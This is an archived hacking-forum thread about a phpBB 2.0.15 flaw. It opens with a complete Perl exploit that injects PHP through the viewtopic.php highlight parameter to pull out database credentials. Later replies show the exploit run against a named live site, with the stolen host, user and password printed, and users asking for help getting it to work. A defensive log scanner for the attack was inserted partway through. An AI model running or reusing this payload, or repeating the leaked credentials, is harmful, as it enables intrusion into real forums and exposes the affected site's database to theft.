
View full version : PhpBB 2.0.15 Database Authentication Details Exploit


VARVAR
31.08.2005, 01:14
#!/usr/bin/perl

# ************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "superloneEST";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

print $sploit,"\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
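A defender-side check for the request shape the script above sends, added here as an example written for this page (it is not part of the original post, nor phpBB's own code): it parses Apache combined-format access-log lines and flags viewtopic.php requests whose URL-decoded highlight parameter closes the quoted string and continues with PHP syntax, or names the database config variables the script reads out. The log format, client IPs, timestamps and the benign requests in the sample are constructed assumptions; the second sample line carries the exact query string the script builds.

```python
"""Scan Apache access-log lines for phpBB 2.0.15 viewtopic.php highlight
injection attempts. Added example for this page; not part of the original
post or of phpBB itself."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format (assumed): %h %l %u %t "%r" %>s %b "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# An injected highlight value closes phpBB's quoted string and continues with
# PHP syntax: a function call such as printf(...) or a $variable.
QUOTE_RE = re.compile(r"""['"]""")
CALL_RE = re.compile(r"\b\w+\s*\(")
VAR_RE = re.compile(r"\$\w+")
# Database config variable names the exploit above reads out.
CONFIG_VARS = ("dbhost", "dbname", "dbuser", "dbpasswd")

# Constructed sample lines (IPs, timestamps and the benign requests are made up;
# the second line carries the query string the exploit builds).
SAMPLE_LOG = """\
10.0.0.5 - - [31/Aug/2005:01:20:11 +0400] "GET /forum/viewtopic.php?t=1266&highlight=perl HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Aug/2005:01:21:03 +0400] "GET /forum/viewtopic.php?t=1&highlight=%27.printf(superloneEST.$dbhost.superloneEST.$dbname.superloneEST.$dbuser.superloneEST.$dbpasswd.superloneEST).%27 HTTP/1.1" 200 6020 "-" "-"
10.0.0.7 - - [31/Aug/2005:01:22:40 +0400] "GET /forum/viewtopic.php?t=42&highlight=don%27t+panic HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
10.0.0.7 - - [31/Aug/2005:01:23:02 +0400] "GET /forum/index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

def analyse_highlight(value):
    """Return a reason if the URL-decoded highlight looks like injected PHP, else None.

    A lone apostrophe (a user searching for "don't") is not enough on its own;
    the value must also carry call or variable syntax.
    """
    if any("$" + name in value for name in CONFIG_VARS):
        return "references database config variables"
    has_quote = bool(QUOTE_RE.search(value))
    if has_quote and (CALL_RE.search(value) or VAR_RE.search(value)):
        return "quote breakout followed by PHP syntax"
    return None

def scan_log(text):
    """Return a list with one finding dict per viewtopic.php request whose highlight is suspicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/viewtopic.php"):
            continue
        # parse_qs percent-decodes the values, so %27 becomes a real quote here
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("highlight", []):
            reason = analyse_highlight(value)
            if reason:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "topic": params.get("t", [""])[0],
                    "reason": reason,
                    "highlight": value,
                })
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} t={f['topic']} HTTP {f['status']}: {f['reason']}")
```

The response status is recorded but not used to filter: as one reply further down shows, the same request can produce an Internal Server Error, and a 500 still means the payload reached the vulnerable highlight handling. Treat any hit as a reason to check the forum version (the thread says only 2.0.15 is affected) and to rotate the database credentials named in config.php.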

Tier
31.08.2005, 13:52
/forum/viewtopic.php?t=1&highlight='.printf(superloneEST.$dbhost.superloneEST.$dbname.superloneEST.$dbuser.superloneEST.$dbpasswd.superloneEST).'
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
So that's how it goes, blanks where the values should be :))

Dj Skeleton™
31.08.2005, 17:47
Guys, explain how to make this work.


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx.xxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Apache/1.3.28 Server at www.xxxxx.xxx Port 80

VARVAR
31.08.2005, 20:13
Only works on phpBB 2.0.15.


H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx

Tier
31.08.2005, 23:00
Only works on phpBB 2.0.15.


H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx
So where's the catch? :)
I still get blanks.

Manoz
04.09.2005, 15:43
What do I do with this:
<code>
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
</code>

Lamer protection again?

Grrl
04.10.2005, 04:35
Useless exploit IMHO; for this forum version there is a remote command execution exploit, which is far more useful.

2stalles

URL http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.3.809-MSWin32-x86.msi
Here's your Perl.
People have gotten lazy, damn...

Miller
07.10.2005, 22:01
screen:

http://img305.imageshack.us/img305/4633/17zo.jpg



Question: why doesn't it connect???

KP0T
02.12.2005, 02:10
Same here, I'd like to know too... Why?!

m0nzt3r
02.12.2005, 14:28
Well, they've probably patched it... and Grrl is right, better to use that exploit straight away..

LeopardSS
01.02.2007, 01:45
Damn, what needs to be fixed there so there are no empty lines? Please at least send it to me by PM. You'll get a plus rep from me.

LeopardSS
01.02.2007, 12:21
Whoever helps gets a seven-digit ICQ number and plus reps from me.